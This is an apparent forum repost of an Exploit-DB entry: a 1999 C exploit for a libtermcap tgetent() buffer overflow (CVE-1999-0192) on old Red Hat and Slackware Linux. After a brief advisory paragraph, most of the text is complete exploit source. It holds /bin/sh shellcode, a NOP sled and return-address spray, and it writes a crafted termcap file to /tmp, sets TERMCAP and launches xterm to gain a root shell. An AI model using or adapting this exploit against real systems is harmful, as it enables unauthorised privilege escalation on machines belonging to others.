Exploit RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap 'tgetent()' Local Buffer Overflow (1)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19464
Проверка EDB
  1. Пройдено
Автор
M0F0
Тип уязвимости
LOCAL
Платформа
LINUX
CVE
cve-1999-0192
Дата публикации
1999-08-18
RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap 'tgetent()' Local Buffer Overflow (1)
C:
// source: https://www.securityfocus.com/bid/588/info

A buffer overflow existed in libtermcap's tgetent() function, which could cause the user to execute arbitrary code if they were able to supply their own termcap file. Versions of libtermcap 2.0.8 and earliear are vulnerable.

Under Red Hat Linux 5.2 and 4.2, this could lead to local users gaining root privileges, as xterm (as well as other possibly setuid programs) are linked against libtermcap. Under Red Hat Linux 6.0, xterm is not setuid root.

Debian and Caldera OpenLinux use the ncurses library instead of termcap and thus are not vulnerable.

/*
   ****************************************************
   ***          libtermcap xterm exploit            ***
   ***                by m0f0 1999                  ***
   ***                                              ***
   ***          it works for xterm/nxterm           ***
   ***          Tested Slackware 3.5, 3.6           ***
   ****************************************************
*/

#include <stdio.h>
#define BUF_SIZE 5000
#define POS_RET  2000
#define POS_SEP  3000
#define RETADDR  0xbfffefef
#define EGG      "/tmp/egg_termcap"

// shellcode
char shellcode[] = // 48 caracteres
    "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
    "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
    "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
    "\xff\xff/bin/sh";

void main (int argc, char *argv[]) {
  int i;
  FILE *f;
  char buf[BUF_SIZE];
  long retaddr, offset;
	
  printf ("\n");
  printf ("****************************************** \n");
  printf ("* libtermcap xterm exploit, by m0f0 1999 * \n");
  printf ("****************************************** \n\n");
  printf ("Use : %s [offset] \n", argv[0]);

  offset = 0;
  if (argc>1) {
    offset = atol (argv[1]);
  }

  retaddr = RETADDR + offset;
  printf ("Return Address = 0x%x \n",retaddr);
	

  // Fill buffer with NOP's
  memset (buf, 0x90, BUF_SIZE);
  buf[BUF_SIZE]=0;
	
  // Set termcap file header and sep
  memcpy (buf, "xterm|", 6);
  memcpy (buf+POS_SEP,":\\",2);

  // Return Address
  for (i=POS_RET; i<=POS_SEP-10; i+=4) {
    *(long*)(buf+i) = (long) retaddr;
  }

  // Copy shellCode
  for (i=0; i<strlen(shellcode); i++) {
    buf[i+2000] = shellcode[i];
  }

  // Write EGG_TERMCAP
  f = fopen (EGG,"w");
  fprintf (f,"%s",buf);
  fclose (f);
	
  // Export TERMCAP
  setenv ("TERMCAP", EGG, 1);

  // Run program
  execl ("/usr/X11R6/bin/xterm","xterm",NULL);

}
 
Источник
www.exploit-db.com

Похожие темы